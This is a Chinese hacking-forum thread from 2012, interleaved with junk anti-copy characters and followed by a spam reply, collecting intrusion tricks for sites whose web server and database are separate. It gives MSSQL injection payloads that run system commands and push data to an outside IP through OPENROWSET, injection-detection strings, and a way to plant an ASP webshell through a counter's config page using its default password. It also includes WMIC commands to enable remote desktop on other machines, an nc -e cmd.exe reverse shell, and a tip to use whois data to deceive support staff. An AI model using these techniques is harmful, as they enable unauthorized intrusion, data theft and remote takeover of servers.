找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3664|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
$ f1 M7 f, L" ?1 A
' K: \/ L# C9 K$ F: n3 `" ?9 [+ M% X# z: J
SA点数据库分离搞法+语句:: L. T# x1 V$ X$ z8 \& W0 X
( P' V* ~* W: E) G3 S
注射点不显错,执行下面三条语句页面都返回正常。
3 S! I0 T5 {" T5 O2 @6 H8 F0 Xand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')0 o3 [) V4 R! O& z7 Y7 {3 `
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')+ ]+ }3 j; n  u* P6 `: x
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
! w( e! Z; E0 {可以列目录,判断系统为2000,web与数据库分离& s3 D* s+ o  e2 q5 I* F' _
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
7 w& c  h( S0 s; s* s6 G+ ^, B在注射点上执行% C7 {0 }- Q* g5 ]* t  p
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--( K9 K1 Z) C& J  y! A0 X: d8 u
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
/ M6 D/ A1 P" k, g$ V& `$ e还有我用NC监听得其他端口都没有得到IP。
1 b; b# g; S# [9 |/ g* f7 t% ?( L  [5 C9 p; n4 l+ H! y
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。: e* q# d- P& V4 y
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--( K# o% g3 |1 l2 T  D* n% D

. N4 p6 D$ m- W4 A;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--' |. `& N2 T6 r4 ?6 ]

7 J' T; }- L* W% |0 R( S2 _现在就猜想是不是数据库是内网而且不能连外网。! K: P- C. P' i; b
9 X3 G  q* O% R

& c; n2 ]. w+ d* G+ g+ Kaccess导出txt文本代码* {! u, g3 j/ s; }3 {$ J
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin! t  Y3 Y) t& a) D8 ~$ Z4 V
. O" Q0 Z9 K! Y, z& l4 ]

9 l) g% @$ t6 `
) [4 e& x5 I9 w5 u自动跳转到指定网站代码头9 |! U/ {, [# R  W- T" x0 A
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>8 |6 U  F4 G; x

9 r6 K( B6 j& ^4 Z2 R% ?( t9 [% q8 c6 h' Z; u+ {* @
入侵java or jsp站点时默认配置文件路径:1 @, y, a1 t+ D
\web-inf\web.xml$ c- J) [" F; s" ^2 s, Y
tomcat下的配置文件位置:
0 D5 p! F2 ?# y" \' t3 J2 g# E3 i\conf\server.xml            (前面加上tomcat路径)
* K7 @; U% o: v, e; ?\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
6 X& A2 K9 m* d& r7 R! Y
$ ~2 R/ n3 q, q/ Z, q  ^
& A8 M* f  f" ?5 @
8 Y; H( {6 t5 a/ g" d. o检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
' Y+ F( X" _: X7 o1 I* u2 r& `& J-1%232 I+ l$ B& M' }
> : q" y0 F3 N( A, K) H5 v9 j
<
! |5 r# O3 b( J; Q0 R' g5 ?1'+or+'1'='18 z) Z( I' n" ~- ?# e. k( t5 r
id=8%bf6 |# D; j) ?7 Z3 w" }
, y7 A9 R, b& J% U3 l1 l: \
全新注入点检测试法:7 K& L, w1 R3 K
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
7 [$ K' r- R3 K4 I- I0 i) C  n7 b
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。# ^8 }# p: x- b$ m2 }6 \
" R5 n  S2 x9 `' S$ f
搜索型注入判断方法:
" k+ f) C' m+ V( }; j4 m北京%' and '1'='1' and '%'=') {+ }6 y- Y8 O2 K) o8 O3 S
北京%' and '1'='2' and '%'='4 }6 F; t& ]( y. F5 I, _
( g7 W# C8 E# s% G
) O0 n- E+ N* {: ~
COOKIES注入:
- R9 W" Q# i- }
- l! z! o. H7 a; I0 Bjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
0 R% i5 R" O. |1 R% Z, C4 ]- d" O' h! M& ^) {
2000专业版查看本地登录用户命令:; ~) U- Q' ^) v5 w
net config workstation
6 O. U+ J/ l% k7 f2 D9 G7 h- H" X
8 b5 k+ J3 q$ J+ t& u, n$ U* P
2003下查看ipsec配置和默认防火墙配置命令:1 K  l' |; ^6 D9 |
netsh firewall show config
1 r1 X) ~* ?4 c  anetsh ipsec static show all
  e- a9 k, r  i# ?1 |6 S$ |1 P
+ ?1 T9 @$ t: R不指派指定策略命令:: O3 ?+ P$ t# q
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
! g$ p" v- v/ E! Onetsh ipsec static show policy all  显示策略名
5 u2 t) {, ~5 E! c/ B: @4 A# J* d1 N
2 W6 m: Q& r' I" _( T0 L" S7 R
猜管理员后台小技巧:6 w7 C( `: K+ R6 t6 m0 h
admin/left.asp
% |9 h8 g% f; L$ f9 }8 A! \/ Badmin/main.asp
4 y( m; J1 t: X5 K- G7 b6 Nadmin/top.asp
% ?1 V2 m- j5 V$ n) L1 L7 F7 Cadmin/admin.asp . h+ b) B$ n' P
会现出菜单导航,然后迅雷下载全部链接
. K+ r8 ^0 ?( A# c
2 [  {8 M. x9 E/ k. q$ o, _# H7 Y3 z( |
社会工程学:
& V" M! i7 i1 U/ {+ E用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人! D9 `! I& N( ^) H& `3 [7 {7 N
然后去骗客服. o1 q% k6 u  w6 i- ^
# T8 n9 q0 T4 a! Y4 t/ o- m+ y  t" |* M
  w3 {3 P9 ~8 S3 ]7 ]6 Q. A$ O
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
: H2 Y- @$ Q" W3 F) W查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
! _5 |$ D; r7 @: t  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
: |$ J, L7 N' V) u1 K- z
$ Q. L& F3 E5 B  @+ V
. |6 m7 k8 R+ ]3 R; `/ R# J
' s+ I# o0 n$ H& T, E6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)7 [: |/ [) }: _; M# d, Z9 t# k

: c' _' E5 O: ]+ Q0 [4 O8 C! ]5 N7 S0 Z% J' {$ ^
7 @3 u( {- Q) m) A3 g
CMD加密注册表位置
, Z$ X% c+ y7 t: N. L(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor4 I" `9 m  s, h6 X4 z
AutoRun
8 |8 l& p5 ^# Q6 W1 {6 Y4 ?* V5 T+ m* H; ~' j
% t) A% R9 n; M! W(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor  }  }; t. E9 U0 E" c" O( O
AutoRun
/ B0 Y% e& v5 G( V9 \; y( S
- U' R- R& E: d  L  ]' _( W! Z0 b0 _" l, o* k9 L
在找注入时搜索Hidden,把他改成test! a# ~* I! k  T) e

; X4 j$ z0 c, a2 S; p- ?9 P+ i
" g- |* S+ q& E; g. w4 \$ h
mstsc /v:IP /console
+ G( B$ T1 c4 G+ ^) E% S. z) B
* g* L+ I, k1 W; g, M6 ?
0 z  Z; G# ~: L5 T# E0 r+ x2 b一句话开3389:! R5 k* u% N$ S1 k. A# @7 M
# {0 `9 v. p3 i$ y( |
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  0 Q* s  z1 X9 N% k) \; j
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.' W& o! W# L# C; {8 h$ D
, o2 c7 }4 i, |- B) w( {
; S, M" w/ y' p* I( m2 S& Q3 d3 u5 @
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:* o2 G5 b/ S3 A1 k( `
Insert into admin(user,pwd) values('test','test')# f6 P2 h' s& [1 G; z1 @# N# L; G
5 I' g8 k/ m( a" J* w; e
$ z0 z4 k; i+ n: ^# E
NC反弹
) K8 J8 V8 ]* S6 R' D8 A8 o8 N先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
& @" D- V5 `7 C! D) S9 B然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)0 ]; i0 n, W2 E$ g! c: G9 G
# K6 _6 |$ ?) s7 {& u9 Y
5 B6 _$ t2 R0 Q( J0 R7 x( L
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题  S6 ^+ `3 S: f
8 f! r# g  o9 E, e7 W6 S
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录- a0 X0 D+ ]& x4 f
例如:
; y. g) M8 c: `. asubst k: d:\www\ 用d盘www目录替代k盘
0 F2 U. U, g. M+ fsubst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表